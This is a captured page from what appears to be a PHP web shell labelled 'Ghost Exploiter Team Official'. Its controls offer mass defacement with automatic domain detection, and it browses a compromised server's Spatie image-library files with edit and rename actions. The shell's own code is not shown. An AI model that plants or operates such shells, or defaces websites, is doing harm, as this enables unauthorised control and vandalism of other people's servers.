Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
spatie
/
image
/
src
/
Exceptions
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
CannotOptimizePng.php
0.217KB
edt
ren
CannotResize.php
0.356KB
edt
ren
CouldNotLoadImage.php
0.378KB
edt
ren
ImageMethodDoesNotExist
...
0.245KB
edt
ren
InvalidColor.php
0.377KB
edt
ren
InvalidFont.php
0.226KB
edt
ren
InvalidImageDriver.php
0.309KB
edt
ren
InvalidManipulation.php
0.396KB
edt
ren
MissingParameter.php
0.101KB
edt
ren
UnsupportedImageFormat.php
0.286KB
edt
ren
<?php namespace Spatie\Image\Exceptions; use Exception; class ImageMethodDoesNotExist extends Exception { public static function make(string $methodName): static { return new static("Method `{$methodName}` does not exist"); } }